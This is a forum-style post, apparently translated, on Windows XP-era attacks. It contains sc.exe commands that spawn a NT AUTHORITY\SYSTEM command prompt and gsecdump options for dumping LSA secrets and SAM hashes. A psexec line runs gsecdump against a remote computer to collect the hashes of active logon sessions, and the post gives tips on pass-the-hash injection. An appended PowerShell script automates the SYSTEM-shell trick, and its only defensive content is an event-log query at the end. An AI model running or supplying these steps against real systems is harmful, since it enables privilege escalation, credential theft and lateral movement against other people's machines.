To get a DOS prompt as NT SYSTEM :)

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process and carry out a hash-injection (pass-the-hash) attack. The foreigners really are good at this; admins are going to be busy. The LM/NT hashes picked up during ARP spoofing, or obtained with gethash, don't need the password cracked at all; it is purely a matter of using the tools. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash, it is 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I checked the original source; it seems to be from 2007/03/16. Depressing, what a gap.
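Added example, not code from the original post or from the truesecurity blog it quotes: the same interactive-service trick scripted end to end in PowerShell, with the cleanup the post does by hand and a quick look at what the host logs. It assumes Windows PowerShell running elevated on an XP/2003-era machine; the service name shellcmdline and the cmd.exe /K start payload are the ones from the post, and the 7045 event query at the end is an assumption about where a defender would look, not something the post mentions.

```powershell
# Added example; not code from the original post or from the truesecurity blog.
# Assumptions: Windows PowerShell running elevated on Windows XP/2003, where
# "type= interact" still puts the spawned window on the console desktop. On Vista
# and later, session 0 isolation keeps service windows off the user's desktop, so
# the same commands still launch cmd.exe as SYSTEM but no prompt becomes visible.
$svc     = 'shellcmdline'                          # service name used on the page
$payload = 'C:\WINDOWS\system32\cmd.exe /K start'  # binpath used on the page

# In PowerShell 'sc' is an alias for Set-Content, so call sc.exe explicitly.
# sc.exe requires a space after each "=" in its argument syntax.
& sc.exe create $svc binpath= $payload type= own type= interact | Out-Null
if ($LASTEXITCODE -ne 0) { throw "CreateService failed (exit code $LASTEXITCODE)" }

try {
    # cmd.exe never calls StartServiceCtrlDispatcher, so the SCM waits out its
    # start timeout and then reports error 1053. By then cmd.exe is already
    # running as NT AUTHORITY\SYSTEM and 'start' has opened the second window.
    $out = & sc.exe start $svc 2>&1 | Out-String
    if ($out -match 'FAILED 1053') {
        Write-Host "1053 as expected: cmd.exe is not a real service, but it was launched."
    } elseif ($LASTEXITCODE -ne 0) {
        Write-Warning "StartService failed unexpectedly:`n$out"
    }
}
finally {
    # Remove the entry so a SYSTEM-launching service does not persist on the host.
    & sc.exe delete $svc | Out-Null
}

# Defender's view (assumption: this is where an admin would look): service
# installation is written to the System log as event 7045 from the Service
# Control Manager, carrying the service name and its ImagePath.
Get-EventLog -LogName System -Source 'Service Control Manager' -InstanceId 7045 -Newest 50 |
    Where-Object { $_.Message -match [regex]::Escape($svc) } |
    Select-Object TimeGenerated, Message
```

The 1053 error is the normal outcome here, not a failure: the SCM only complains because cmd.exe does not speak the service control protocol, and the process it spawned keeps running. Deleting the service afterwards matters because an orphaned entry with that binpath is a one-command SYSTEM shell for anyone who can call sc start.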